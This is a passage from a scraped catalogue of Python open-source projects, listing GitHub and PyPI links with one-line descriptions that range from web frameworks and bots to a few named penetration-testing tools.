https://github.com/chen0040/pyalgs A helgabot for displaying xkcd comics https://github.com/crlane/helga-xkcd A friendly library for parsing HTTP request arguments, with built-in support for popular web frameworks, including Flask, Django, Bottle, Tornado, Pyramid, webapp2, Falcon, and aiohttp. https://github.com/sloria/webargs A lightweight library for converting complex objects to and from simple Python datatypes. https://github.com/marshmallow-code/marshmallow A simple dataflow framework in Python https://github.com/maet3608/nuts-flow PyGeodesy : https://github.com/mrJean1/PyGeodesy python-text-generator : https://github.com/tjkendev/python-text-generator exesexe : https://github.com/mtkennerly/exesexe zenmai : https://github.com/podhmo/zenmai pycolorize : https://github.com/Kit-Scribe/pycolorize alchemyjsonschema : https://github.com/podhmo/alchemyjsonschema PyPBE is a resource for tabletop gaming which allows Gamemasters (GM) to fairly select which random rolling method is closest to an equivalent Point Buy value. https://github.com/drericstrong/pypbe pyqubes : https://github.com/tommilligan/pyqubes/ polypoint : https://github.com/josephacall/polypoint Scrapes an instagram user's photos and videos https://github.com/rarcega/instagram-scraper drf-permissions-router : https://github.com/aljp/drf-permissions-router vine-scraper : https://github.com/rarcega/vine-scraper Creates several arp-scan commands to help locate an unused IP address on a LAN https://github.com/rikosintie/arp-scan nmap-python : https://github.com/rikosintie/nmap-python mendeleev : https://bitbucket.org/lukaszmentel/mendeleev otree-redwood : https://github.com/Leeps-Lab/otree-redwood django-tqdm : https://github.com/desecho/django-tqdm conductr-cli : https://github.com/typesafehub/conductr-cli verto : https://github.com/uccser/verto SMP : https://github.com/halilozercan/SMP hitchtest.readthedocs.org : https://hitchtest.readthedocs.org/ LiSE : https://github.com/LogicalDash/LiSE Faraday-Software : https://github.com/FaradayRF/Faraday-Software agglom_cluster : https://github.com/MSeal/agglom_cluster causalinference : https://github.com/laurencium/causalinference provenance : http://github.com/bmabey/provenance xpaw : https://github.com/jadbin/xpaw python3 : https://github.com/herrcore/punbup/tree/python3 snfilter : https://github.com/stephanellis/snfilter Qprompt : https://github.com/jeffrimko/Qprompt djangoforandroid : https://bitbucket.org/djangoforandroid/ 0.2 : https://pypi.python.org/pypi/djangotoapk/0.2 0.1.5 : https://pypi.python.org/pypi/django-sql-server-bcp/0.1.5 sclogger : https://github.com/Kit-Scribe/sclogger pygazetteer : https://github.com/monkey2000/pygazetteer openstack-interpreter : https://github.com/Adrian-Turjak/openstack-interpreter sensorbee-python : https://github.com/kmaehashi/sensorbee-python https://pypi.python.org/pypi/clang/4.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss sickrage : https://git.sickrage.ca/SiCKRAGE/sickrage python-testcase-generator : https://github.com/tjkendev/python-testcase-generator python-fuku : https://github.com/ABASystems/python-fuku nejimaki : https://github.com/podhmo/nejimaki latest : http://pypicloud.readthedocs.io/en/latest/ veripress : https://github.com/veripress/veripress C compiler written in Python. https://github.com/ShivamSarodia/ShivyC Statistical_Computation.git : https://github.com/susancherry/Statistical_Computation.git ezdxf.git : http://github.com/mozman/ezdxf.git fastnumbers : https://github.com/SethMMorton/fastnumbers natsort : https://github.com/SethMMorton/natsort sharemux : https://github.com/doylezdead/sharemux succubus : https://github.com/ImmobilienScout24/succubus pils : https://github.com/ImmobilienScout24/pils Utils for computer vision research. https://github.com/hellock/cvbase A multi-thread crawler framework with many builtin image crawlers provided. https://github.com/hellock/icrawler readabledelta : https://github.com/wimglenn/readabledelta dirwatcher : https://github.com/linkdd/dirwatcher Parallel computing framework https://github.com/linkdd/link.parallel yaml : https://bitbucket.org/ruamel/yaml 0.1 : https://pypi.python.org/pypi/alice-core/0.1 pdir2: Pretty dir() printing with joy https://github.com/laike9m/pdir2 freezedata : https://github.com/topper-123/freezedata freezedata : https://github.com/topper-123/freezedata seaborn-data : https://github.com/mwaskom/seaborn-data Simple cross-platform colored terminal text in Python https://github.com/tartley/colorama ptpython : https://github.com/jonathanslenders/ptpython www.bpython-interpreter.org : https://www.bpython-interpreter.org/ tomobi : https://github.com/nibrahim/tomobi Python RGB Conversion Lib https://github.com/Moduland/pyrgb Virtual Desktop time tracker https://github.com/lepisma/dime Flask-Boost : https://github.com/jingz/Flask-Boost algos-py : https://github.com/all3fox/algos-py microphone : https://github.com/benhoff/microphone facebook_api_script : https://github.com/benhoff/facebook_api_script https://bmtgoncalves.github.io/pyNASA/?utm_content=buffer4cea2&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer reobject : https://github.com/onyb/reobject tinytext : https://github.com/hugovk/tinytext twitter-tools : https://github.com/hugovk/twitter-tools random-street-view : https://github.com/hugovk/random-street-view dstoolbox : https://github.com/ottogroup/dstoolbox science_flask : https://github.com/danielhomola/science_flask ezsettings : http://github.com/samyzaf/ezsettings ezprogbar : https://github.com/samyzaf/ezprogbar xcanvas : https://github.com/samyzaf/xcanvas toonlib : https://github.com/costastf/toonlib pypiwi : https://bitbucket.org/creeerio/pypiwi bitmask-dev : https://github.com/leapcode/bitmask-dev Generalized Sandpiles for eyegasms https://github.com/darshanime/sandpiles spip https://github.com/florianludwig/spip Code Finding Owl https://github.com/FlorianLudwig/code-owl GitPython is a python library used to interact with Git repositories. https://github.com/gitpython-developers/GitPython An asynchronous library for accessing mongo with tornado.ioloop https://github.com/bitly/asyncmongo web3.py : https://github.com/pipermerriam/web3.py 0.0.1.dev0 : https://pypi.python.org/pypi/nbmerge/0.0.1.dev0 onyx : https://bitbucket.org/sbraccia/onyx python-office365 : https://github.com/swimlane/python-office365 bearychat.py : https://github.com/bearyinnovative/bearychat.py counterparty.io : http://counterparty.io/ prophyle : https://github.com/karel-brinda/prophyle cyvcf2 : https://github.com/brentp/cyvcf2/ An easy way to publish your python packages. https://github.com/hugollm/foster fb-messenger-bot : https://github.com/yasoob/fb-messenger-bot django-admin-steroids : https://github.com/chrisspen/django-admin-steroids ThreatExchange : https://github.com/facebook/ThreatExchange Reverse-engineering the new “captchaless” ReCaptcha system... https://github.com/neuroradiology/InsideReCaptcha jumeaux.git : https://github.com/tadashi-aikawa/jumeaux.git pytsite : https://github.com/pytsite/pytsite Python virtual environments wrangler https://github.com/randomir/envie Multi-vendor library to simplify Paramiko SSH connections to network devices https://github.com/ktbyers/netmiko indexedredis : https://github.com/kata198/indexedredis python-nonblock : https://github.com/kata198/python-nonblock A modern, browser-based frontend to gdb (gnu debugger). Add breakpoints, view stack traces, and more in C, C++, Go, and Rust. Simply run gdbgui from the terminal and a new tab will open in your browser. https://github.com/cs01/gdbgui conformity : https://github.com/eventbrite/conformity/ wiki : https://github.com/thumbor/thumbor/wiki IoTPy : https://github.com/AssembleSoftware/IoTPy Write desktop and web apps in pure Python https://github.com/zoofIO/flexx toil : https://github.com/BD2KGenomics/toil bottle-react : https://github.com/keredson/bottle-react 0.1.6 : https://pypi.python.org/pypi/django-sql-server-bcp/0.1.6 1.2.0 : https://pypi.python.org/pypi/falcon/1.2.0 harambe : https://github.com/mardix/harambe dockerscript : https://github.com/durandj/dockerscript spartacus : http://github.com/wind39/spartacus Aerolyzer : https://github.com/Aerolyzer/Aerolyzer A zero boiler plate bluetooth remote https://github.com/martinohanlon/BlueDot pyobd : https://github.com/roflson/pyobd django-health-monitor : https://github.com/gracenote/django-health-monitor make CLI-App easier https://github.com/wangwenpei/cliez mongoengine : https://github.com/MongoEngine/mongoengine A command line tool (and Python library) for archiving Twitter JSON https://github.com/docnow/twarc apolloMusicPlayer : https://github.com/ebber/apolloMusicPlayer jupyterhub-tmpauthenticator : https://github.com/yuvipanda/jupyterhub-tmpauthenticator jupyterhub : https://github.com/jupyterhub/jupyterhub moneywagon : https://github.com/priestc/moneywagon html-table-extractor : https://github.com/yuanxu-li/html-table-extractor quora-crawler : https://github.com/yuanxu-li/quora-crawler A library for simplifying page objects. https://github.com/jenterkin/selenium-page-elements https://pypi.python.org/pypi/DTStock/0.1.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss raco : https://github.com/uwescience/raco Explorations of Using Python to play Grand Theft Auto 5. https://github.com/Sentdex/pygta5 Portable SSL-enabled IMAP & SMTP https://github.com/andreas-gone-wild/blog/blob/master/portable_ssl_imap_smtp.md WeasyPrint converts web documents (HTML with CSS, SVG, …) to PDF. https://github.com/Kozea/WeasyPrint 0.0.2 : https://pypi.python.org/pypi/fca/0.0.2 Scapy Install for Windows with Python 2.7 https://github.com/zlorb/scapy Scapy: the python-based interactive packet manipulation program & library https://github.com/secdev/scapy 0.0.3 : https://pypi.python.org/pypi/alice-pi/0.0.3 pybrain : https://github.com/pybrain/pybrain python-gelfclient : https://github.com/orionvm/python-gelfclient FBI-Scraper : https://github.com/GKalliatakis/FBI-Scraper master : http://prospector.landscape.io/en/master/ warcio : https://github.com/webrecorder/warcio A Python library for simulating finite automata and Turing machines https://github.com/caleb531/automata coconut : https://github.com/evhub/coconut checksumdir : https://github.com/cakepietoast/checksumdir PyTrakt : https://github.com/moogar0880/PyTrakt drf-pyotp : https://github.com/inforian/drf-pyotp sotoki : https://github.com/openzim/sotoki AcraNetwork : https://github.com/diarmuidcwc/AcraNetwork Photini : https://github.com/jim-easterbrook/Photini python-gphoto2 : https://github.com/jim-easterbrook/python-gphoto2 pyctools : https://github.com/jim-easterbrook/pyctools pyctools-pal : https://github.com/jim-easterbrook/pyctools-pal The Traditional Swiss Army Knife for OSINT https://github.com/aancw/belati MUGAlyser : https://github.com/jdrumgoole/MUGAlyser commodore : https://bitbucket.org/johannestaas/commodore Asynchronous replication framework for distributed Python projects https://github.com/zhebrak/raftos project-template : https://github.com/park-python/project-template Automatically mock your HTTP interactions to simplify and speed up testing https://github.com/kevin1024/vcrpy pytest-httpbin : https://github.com/kevin1024/pytest-httpbin pypcap : https://github.com/pynetwork/pypcap python-sepa-netherlands : https://github.com/VerenigingCampusKabel/python-sepa-netherlands pyzmp : http://github.com/asmodehn/pyzmp python-webmoney-api : https://bitbucket.org/sallyruthstruik/python-webmoney-api Ves : https://github.com/fastschnell/Ves incuna-surveys : https://github.com/incuna/incuna-surveys pynetcf : https://github.com/TUW-GEO/pynetcf transform and converting between html,json,python-dict,command-line,dir-path https://github.com/ihgazni2/dlixhict-didactic google-resumable-media-python : https://github.com/GoogleCloudPlatform/google-resumable-media-python Import arbitrary code from Stack Overflow as Python modules. https://github.com/drathier/stack-overflow-import Automated victim-customized phishing attacks against Wi-Fi clients https://github.com/wifiphisher/wifiphisher mixer : https://github.com/klen/mixer pyswagger : https://github.com/mission-liao/pyswagger Library of input functions with type conversion https://github.com/dokelung/tinp The Big List of Naughty Strings is a list of strings which have a high probability of causing issues when used as user-input data. https://github.com/minimaxir/big-list-of-naughty-strings Data scraper for Facebook Pages, and also code accompanying the blog post How to Scrape Data From Facebook Page Posts for Statistical Analysis https://github.com/minimaxir/facebook-page-post-scraper instabot.py : https://github.com/artemdumanov/instabot.py ampify : https://github.com/tav/ampify pyc2py : https://github.com/eduble/pyc2py Tag : https://github.com/titoBouzout/Tag Dictionaries : https://github.com/titoBouzout/Dictionaries The leading native Python SSHv2 protocol library. https://github.com/paramiko/paramiko Sn1per : https://github.com/1N3/Sn1per vim-snippets : https://github.com/honza/vim-snippets pyphoon : https://github.com/chubin/pyphoon wttr.in : https://github.com/chubin/wttr.in Use JSON files as if they are python modules : https://github.com/kragniz/json-sempai ssh-tunnel : https://github.com/aalku/ssh-tunnel Bruteforce attack for .rar : https://github.com/z4r4tu5tr4/PyRarCrack?platform=hootsuite Closer - run, monitor and closer remote SSH processes automatically : https://github.com/haarcuba/closer Pure-Python Git implementation : https://github.com/jelmer/dulwich samba : https://github.com/samba-team/samba WAbot : https://github.com/kaveenr/WAbot SiripalaBot : https://github.com/kaveenr/SiripalaBot python-whatsapp-bot : https://github.com/siyei/python-whatsapp-bot breakbot : https://github.com/stenyak/breakbot A Mono/.NET, JAVA, Python and PHP chatter bot API that supports Cleverbot, JabberWacky and Pandorabots. Original repository https://github.com/Schumix/ChatterBotApi A Mono/.NET, JAVA, Python and PHP chatter bot API that supports Cleverbot, JabberWacky and Pandorabots. : https://github.com/pierredavidbelanger/chatter-bot-api AWS SDK for Python : https://github.com/boto/boto3 Gameboy emulator written in Python : https://github.com/Baekalfen/PyBoy webpy : https://github.com/webpy/webpy whatsapp-bot-seed : https://github.com/joaoricardo000/whatsapp-bot-seed A pure python implementation of multicast DNS service discovery : https://github.com/jstasiak/python-zeroconf celery. : https://github.com/celery/celery. Messaging library for Python. : https://github.com/celery/kombu webpy : https://github.com/webpy/webpy An easy to use and portable Virtual Private Network (VPN) system built with Linux and a Raspberry Pi. : https://github.com/iadgov/goSecure Send messages and files over Telegram from the command-line. : https://github.com/rahiel/telegram-send python-telegram-bot : https://github.com/python-telegram-bot/python-telegram-bot pydoc-markdown : https://github.com/NiklasRosenstein/pydoc-markdown shellstats : https://github.com/rahiel/shellstats supervisor-alert : https://github.com/rahiel/supervisor-alert VocaBot : https://github.com/bomjacob/VocaBot mau_mau_bot : https://github.com/jh0ker/mau_mau_bot A Telegram bot that forwards Tweets : https://github.com/franciscod/telegram-twitter-forwarder-bot telegram-universal-forwarder-bot : https://github.com/franciscod/telegram-universal-forwarder-bot pyfprint : https://github.com/luksan/pyfprint a small, expressive orm -- supports postgresql, mysql and sqlite : https://github.com/coleifer/peewee Environment Variable Parsing for Python : https://github.com/rconradharris/envparse py-phash : https://github.com/polachok/py-phash Basic structure for a simple Python CLI : https://github.com/tstringer/pycli Reddit streaming CLI : https://github.com/tstringer/redditwatcher Ansible module development with examples and walk-throughs : https://github.com/tstringer/ansible-dev-by-example Ansible is a radically simple IT automation platform that makes your applications and systems easier to deploy. Avoid writing scripts or custom code to deploy and update your applications— automate in a language that approaches plain English, using SSH, with no agents to install on remote systems. : https://github.com/ansible/ansible A to-do/backlog CLI with Trello for a backend : https://github.com/tstringer/jersey Python API wrapper around Trello's API : https://github.com/sarumont/py-trello A simple library for building twilio-powered Django webapps. : https://github.com/rdegges/django-twilio Force SSL on your Django site. : https://github.com/rdegges/django-sslify django-skel : https://github.com/rdegges/django-skel A skeleton command line program in Python. : https://github.com/rdegges/skele-cli spotify-local-http-api : https://github.com/cgbystrom/spotify-local-http-api ystockquote : https://github.com/cgoldberg/ystockquote weathercli : https://github.com/cgoldberg/weathercli multi-mechanize : https://github.com/cgoldberg/multi-mechanize A linux system information web dashboard using psutils and flask : https://github.com/Jahaja/psdash Django middleware that logs http request body. : https://github.com/Rhumbix/django-request-logging A Python-port of @jasonlong's lovely SVG generation library. : https://github.com/bryanveloso/geopatterns Learn how to design large-scale systems. Prep for the system design interview. Includes Anki flashcards. : https://github.com/donnemartin/system-design-primer A supercharged Git/GitHub command line interface (CLI). An official integration for GitHub and GitHub Enterprise: : https://github.com/donnemartin/gitsome A curated list of awesome Amazon Web Services (AWS) libraries, open source repos, guides, blogs, and other resources. Featuring the Fiery Meter of AWSome. : https://github.com/donnemartin/awesome-aws A supercharged AWS command line interface (CLI). : https://github.com/donnemartin/saws Web Crawlers. : https://github.com/donnemartin/spiders Browse Hacker News like a haxor: A Hacker News command line interface (CLI). : https://github.com/donnemartin/haxor-news Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network : https://github.com/m0rtem/CloudFail Proxy for Chrome DevTools. Fully compatible with Selenium and ChromeDriver : https://github.com/bayandin/devtools-proxy pycrumbs : https://github.com/kirang89/pycrumbs pythonidae : https://github.com/svaksha/pythonidae awesome-python : https://github.com/vinta/awesome-python Python wrapper for tshark, allowing python packet parsing using wireshark dissectors : https://github.com/KimiNewt/pyshark ThinkDSP : https://github.com/AllenDowney/ThinkDSP tidyextractors : https://github.com/networks-lab/tidyextractors/ datahandling : https://github.com/AshleySetter/datahandling from-python-to-numpy : https://github.com/rougier/from-python-to-numpy Python+Numpy+OpenGL: fast, scalable and beautiful scientific visualization : https://github.com/glumpy/glumpy Video editing with Python : https://github.com/Zulko/moviepy Pure Python library for PNG image encoding/decoding : https://github.com/drj11/pypng pdftables : https://github.com/drj11/pdftables Photo-realistic 3D rendering with Python and POV-Ray : https://github.com/Zulko/vapory r3py : https://github.com/dontcare/r3py Alexa Skills Kit for Python : https://github.com/johnwheeler/flask-ask A "micro" editor for MicroPython and the BBC micro:bit. Written in Python and Qt5 : https://github.com/mu-editor/mu imageio - a Python library for reading and writing image data : https://imageio.github.io/ Interactive, reactive web apps in pure python : https://github.com/plotly/dash Write Python APIs, then call them from JavaScript using the V8 engine. :https://github.com/tbodt/v8py Using scrapy, redis, mongodb, graphite to achieve a distributed network crawler, the underlying storage mongodb cluster, distributed using redis implementation, crawler status display using graphite : https://github.com/gnemoug/distribute_crawler Output scrapy statistics to graphite/carbon :https://github.com/noplay/scrapy-graphite galena : https://github.com/20minutes/galena Pure Python Implementation of MySQL replication protocol build on top of PyMYSQL : https://github.com/noplay/python-mysql-replication gns3-gui. : https://github.com/GNS3/gns3-gui. An improbable web debugger through WebSockets : https://github.com/Kozea/wdb WeasyPrint converts web documents (HTML with CSS, SVG, …) to PDF. : https://github.com/Kozea/WeasyPrint PYthon svg GrAph plotting Library : https://github.com/Kozea/pygal Radicale : https://github.com/Kozea/Radicale tinycss is a complete yet simple CSS parser for Python. : https://github.com/Kozea/tinycss scrapy-proxies : https://github.com/aivarsk/scrapy-proxies Python-based continuous integration testing framework; your pull requests are more than welcome! : https://github.com/buildbot/buildbot SOCKSv4 proxy for servers with multiple IPs : https://github.com/aivarsk/multi-socks Makes SVG shapes look hand-drawn and creates UML diagrams using yUML (http://yuml.me) syntax : https://github.com/aivarsk/scruffy #python Docker image for Graphite & Statsd : https://github.com/hopsoft/docker-graphite-statsd Two stupid Meng Jingdong distributed crawlers. Blog details : https://github.com/samrayleung/jd_spider PortScanner : https://github.com/samrayleung/PortScanner qzonePictureSpider : https://github.com/samrayleung/qzonePictureSpider A formatter for Python files : https://github.com/google/yapf adds flavor of interactive filtering to the traditional pipe concept of UNIX shell : https://github.com/mooz/percol Flask-S3-Uploader : https://github.com/doobeh/Flask-S3-Uploader parsimonious : https://github.com/erikrose/parsimonious whitenoise : https://github.com/evansd/whitenoise staticgenerator : https://github.com/lucky/staticgenerator sshttproxy : https://github.com/evansd/sshttproxy Solid : https://github.com/100/Solid Serverless Python Web Services : https://github.com/Miserlou/Zappa SoundScrape : https://github.com/Miserlou/SoundScrape tqdm : https://github.com/tqdm/tqdm magic-wormhole : https://github.com/warner/magic-wormhole PhotoCollage : https://github.com/adrienverge/PhotoCollage coala-bears : https://github.com/coala/coala-bears runa : https://github.com/djc/runa demo-rp : https://github.com/portier/demo-rp git-lint : https://github.com/sk-/git-lint python-afl : https://github.com/jwilk/python-afl keyboard-stickers : https://github.com/adrienverge/keyboard-stickers context_unnester : https://github.com/adrienverge/context_unnester vim-python-logging : https://github.com/adrienverge/vim-python-logging cli2man : https://github.com/tobimensch/cli2man termsql : https://github.com/tobimensch/termsql sahara : https://github.com/openstack/sahara cinder : https://github.com/openstack/cinder horizon : https://github.com/openstack/horizon familytreemaker : https://github.com/adrienverge/familytreemaker redis-dump-load : https://github.com/p/redis-dump-load sqlalchemy-searchable : https://github.com/kvesteri/sqlalchemy-searchable validators : https://github.com/kvesteri/validators furl : https://github.com/gruns/furl django-taggit : https://github.com/alex/django-taggit django-ajax-validation : https://github.com/alex/django-ajax-validation txsocksx : https://github.com/habnabit/txsocksx fbchat : https://github.com/carpedm20/fbchat/ Robot Framework keyword library wrapper for requests : https://github.com/bulkan/robotframework-requests SimpleCV : https://github.com/sightmachine/SimpleCV Luigi is a Python module that helps you build complex pipelines of batch jobs : https://github.com/spotify/luigi Python Socket.IO server : https://github.com/miguelgrinberg/python-socketio Extremely fast and scalable Python FTP server library : https://github.com/giampaolo/pyftpdlib The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here. : https://github.com/trustedsec/social-engineer-toolkit The Penetration Testers Framework (PTF) is a way for modular support for up-to-date tools. https://github.com/trustedsec/ptf Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. : https://github.com/trustedsec/unicorn Self-service finite-state machines for the programmer on the go. : https://github.com/glyph/Automat twisted : https://github.com/twisted/twisted python : https://jenkins.io/solutions/python/ netgrasp : https://github.com/jeremyandrews/netgrasp telegram-analysis : https://github.com/expectocode/telegram-analysis Pillow : https://github.com/python-pillow/Pillow Headless-rendering-with-python : https://github.com/cprogrammer1994/Headless-rendering-with-python Modern OpenGL binding for python https://github.com/cprogrammer1994/ModernGL 3D mathematical functions using NumPy : https://github.com/adamlwgriffiths/Pyrr bullet3 : https://github.com/bulletphysics/bullet3 Pure Python OpenGL framework using PyOpenGL http://adamlwgriffiths.github.com/PyGLy/ Pythonic OpenGL Bindings : https://github.com/adamlwgriffiths/OMGL bottle : https://github.com/bottlepy/bottle WSGI middleware for sessions and caching : https://github.com/bbangert/beaker A library to convert curl requests to python-requests. https://github.com/spulec/uncurl lettuce : https://github.com/gabrielfalcao/lettuce HTTPretty : https://github.com/gabrielfalcao/HTTPretty django-paypal : https://github.com/spookylukey/django-paypal Detect mobile browsers and serve different template flavours to them.https://github.com/gregmuellegger/django-mobile django-floppyforms : https://github.com/gregmuellegger/django-floppyforms An JSON+HTTP server for the rope Python refactoring library https://github.com/abingham/traad Extract, convert and transcode bluray and dvd rips. Preserve HD audio and subtitles while resizing. Individual settings per movie. https://github.com/shidarin/RipMaster PRAW, an acronym for "Python Reddit API Wrapper", is a python package that allows for simple access to Reddit's API. https://github.com/praw-dev/praw spellchecking library for python https://github.com/rfk/pyenchant django-socketio : https://github.com/stephenmcd/django-socketio CMS framework for Django https://github.com/stephenmcd/mezzanine record and replay interactive terminal sessions https://github.com/rfk/playitagainsam The classic retro game recreated using Pygame and python https://github.com/tasdikrahman/spaceShooter Youtube-via-FB : https://github.com/abdulfatir/Youtube-via-FB Python's Filesystem abstraction layer https://github.com/PyFilesystem/pyfilesystem2 Another API-less Instagram pictures and videos downloader. https://github.com/althonos/InstaLooter Web development platform : https://github.com/moyaproject/moya pydantic-docs.helpmanual.io : https://pydantic-docs.helpmanual.io/ Websockify is a WebSocket to TCP proxy/bridge. This allows a browser to connect to any application/server/service. Implementations in Python, C, Node.js and Ruby. : https://github.com/novnc/websockify TorStat : https://github.com/suraj-root/TorStat omdb.py : https://github.com/dgilland/omdb.py pydash : https://github.com/dgilland/pydash hashfs : https://github.com/dgilland/hashfs sqlservice : https://github.com/dgilland/sqlservice alchy : https://github.com/dgilland/alchy put-me-on-a-watchlist : https://github.com/neufv/put-me-on-a-watchlist gsheets : https://github.com/xflr6/gsheets poreduck : https://github.com/alexiswl/poreduck Dr0p1t-Framework : https://github.com/D4Vinci/Dr0p1t-Framework llvmlite : https://github.com/numba/llvmlite PeachPy : https://github.com/Maratyszcza/PeachPy lifelines : https://github.com/CamDavidsonPilon/lifelines Library for reading and writing Photoshop PSD and PSB files https://github.com/mdboom/pytoshop hump : https://github.com/vrld/hump StarryPy3k : https://github.com/StarryPy/StarryPy3k JA3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way. : https://github.com/salesforce/ja3 gns3-documentation-template : https://github.com/GNS3/gns3-documentation-template ipydeps : https://github.com/nbgallery/ipydeps toga : https://github.com/pybee/toga install.html : https://pythonhosted.org/PyGraphics/install.html moviepy : https://github.com/Zulko/moviepy Compute positions of the planets and stars https://pypi.python.org/pypi/pyephem/ 16bit Image loading/saving for Python3 https://github.com/jamesgregson/easy_image_io A fast image processing library with low memory needs. https://github.com/jcupitt/libvips superCodingBot : https://github.com/Gotham13121997/superCodingBot plain_obj : https://github.com/suzaku/plain_obj cnamedtuple : https://github.com/llllllllll/cnamedtuple Machinery for building and testing Python Wheels for Linux, OSX and (less flexibly) Windows. https://github.com/matthew-brett/multibuild Telegram Bot for downloading MP3 rips of tracks/sets from SoundCloud, Bandcamp, YouTube with tags and artwork. https://github.com/gpchelkin/scdlbot selfspy : https://github.com/gurgeh/selfspy conda-auto-env : https://github.com/chdoig/conda-auto-env Custom Jupyter Notebook Themes https://github.com/dunovank/jupyter-themes pystruct : https://github.com/pystruct/pystruct Literate-style documentation generator. https://github.com/pycco-docs/pycco A python library for accurate and scaleable fuzzy matching, record deduplication and entity-resolution. https://github.com/dedupeio/dedupe A fast PostgreSQL Database Client Library for Python/asyncio. https://github.com/magicstack/asyncpg Ultra fast implementation of asyncio event loop on top of libuv. https://github.com/magicstack/uvloop PostgreSQL Client Driver Performance Benchmarking Toolbench https://github.com/magicstack/pgbench A curated database of insecure Python packages https://github.com/pyupio/safety-db Javascript url handling for Django that doesn't hurt. https://github.com/ierror/django-js-reverse flask-classy : https://github.com/apiguy/flask-classy A micropython driver for the mcp4725 I²C DAC https://github.com/wayoda/micropython-mcp4725 Lightweight Python utilities for working with Redis https://github.com/coleifer/walrus featuretools : https://github.com/Featuretools/featuretools PySchemes is a library for validating data structures in python https://github.com/shivylp/pyschemes schemas : https://github.com/fabric8-analytics/fabric8-analytics-server/tree/master/bayesian/schemas latest : https://jsl.readthedocs.io/en/latest/ flask-webtest : https://github.com/aromanovich/flask-webtest flask-tuktuk : https://github.com/aromanovich/flask-tuktuk Optional static typing for Python 2 and 3 (PEP484) https://github.com/python/mypy sphinxcontrib-autodoc_doxygen : https://github.com/rmcgibbo/sphinxcontrib-autodoc_doxygen Efficiently computes derivatives of numpy code. https://github.com/HIPS/autograd conda-recipes : https://github.com/omnia-md/conda-recipes sphinxcontrib-lunrsearch : https://github.com/rmcgibbo/sphinxcontrib-lunrsearch ReStructuredText and Sphinx bridge to Doxygen https://github.com/michaeljones/breathe Transparently use webpack with django https://github.com/ezhome/django-webpack-loader django-datetime-widget : https://github.com/asaglimbeni/django-datetime-widget A django application to manage advertising and advertising zones. https://github.com/andrewebdev/django-adzone django-video : https://github.com/andrewebdev/django-video Djangorecipe: easy install of Django with buildout https://github.com/rvanlaar/djangorecipe ansible-webfaction-gunicorn-django : https://github.com/bitlabstudio/ansible-webfaction-gunicorn-django Django admin CKEditor integration. https://github.com/django-ckeditor/django-ckeditor django-page-cms : https://github.com/batiste/django-page-cms Plug and play continuous integration with django and jenkins https://github.com/kmmbvnr/django-jenkins Material Design for django forms and admin https://github.com/viewflow/django-material Django friendly finite state machine support https://github.com/kmmbvnr/django-fsm Finally, a JSONPath implementation for Python that aims to be standard compliant. That's all. Enjoy it. https://github.com/h2non/jsonpath-ng Django forum solution. Tested, documented, shipped with example project. https://github.com/hovel/pybbm django-graphos : https://github.com/agiliq/django-graphos Add forms and formsets to other forms like they were fields. https://github.com/gregmuellegger/django-superform SimpleJinjaServer : https://github.com/NamPNQ/SimpleJinjaServer Seamless operability between C++11 and Python https://github.com/pybind/pybind11 nose-timer : https://github.com/mahmoudimus/nose-timer Vigil, the eternal morally vigilant programming language https://github.com/munificent/vigil sqs-s3-logger : https://github.com/ellimilial/sqs-s3-logger Python Sorted Container Types: SortedList, SortedDict, and SortedSet https://github.com/grantjenks/sorted_containers Honeybee server for the hackathon https://github.com/ladybug-tools/honeybee-server python-revit-resources : https://github.com/gtalarico/python-revit-resources pyRevit : https://github.com/eirannejad/pyRevit Excuses for bad programmers. https://github.com/aaronbassett/Bad-Tools Google App Engine based on Python, Flask, RESTful, Bootstrap and tons of other cool features https://github.com/gae-init/gae-init Implemenents start/stop/restart commands with wildcard support for Supervisor https://github.com/aleszoulek/supervisor-wildcards A Redis cache backend for django https://github.com/sebleier/django-redis-cache channels-example : https://github.com/jacobian/channels-example HTTP client for Open API https://github.com/rightlag/pyswagger A tool for validating data using JSON Schema and converting JSON Schema documents into different data-interchange formats https://github.com/pennsignals/aptos Python PEX rules for Bazel https://github.com/benley/bazel_rules_pex smart_open is a Python 2 & Python 3 library for efficient streaming of very large files from/to S3, HDFS, WebHDFS, HTTP, or local (compressed) files https://pypi.python.org/pypi/smart_open Python Security Scripts https://github.com/ninijay/pycurity web-platform-tests : https://github.com/w3c/web-platform-tests An interactive pip requirements upgrader. It also updates the version in your requirements.txt file. https://github.com/simion/pip-upgrader Trampoline provides you with tools to easily setup, manage and index your Django models in ElasticSearch. It uses celery and is heavily reliant on elasticsearch_dsl. https://github.com/laurentguilbert/django-trampoline sublime-slack-integration : https://github.com/simion/sublime-slack-integration BokehDjango : https://github.com/konoanalytics/BokehDjango mongodb-quickstart-course : https://github.com/mikeckennedy/mongodb-quickstart-course py.processing-play : https://github.com/villares/py.processing-play Security camera based on a Raspberry Pi and Telegram, controllable via smartphone and desktop computer. https://github.com/scaidermern/piCamBot fuzzinator : https://github.com/renatahodovan/fuzzinator circleci.py : https://github.com/levlaz/circleci.py Build large Kubernetes clusters in AWS with the performance and visibility of native VPC networking https://github.com/romana/vpc-router marshmallow is an ORM/ODM/framework-agnostic library for converting complex datatypes, such as objects, to and from native Python datatypes. https://marshmallow.readthedocs.io/en/latest/ Awesome autocompletion and static analysis library for python. https://github.com/davidhalter/jedi python-project-template : https://github.com/seanfisk/python-project-template structureshrink : https://github.com/DRMacIver/structureshrink Advanced property-based (QuickCheck-like) testing for Python https://github.com/HypothesisWorks/hypothesis-python/ hypothesis-java : https://github.com/HypothesisWorks/hypothesis-java Extract Keywords from sentence or Replace keywords in sentences. https://github.com/vi3k6i5/flashtext billboard-charts : https://github.com/guoguo12/billboard-charts Simple distributed task processing for Python 3. https://github.com/Bogdanp/dramatiq Expressive Digital Signal Processing (DSP) package for Python https://github.com/danilobellini/audiolazy Baroque is an event brokering framework with a honey-sweet interface https://github.com/baroquehq/baroque UrlShortener : https://github.com/p53ud0k0d3/UrlShortener Easy to use map and starmap python equivalents https://github.com/zeehio/parmap Decorator class implementation for Python https://github.com/lig/decoratorium Restful API framework 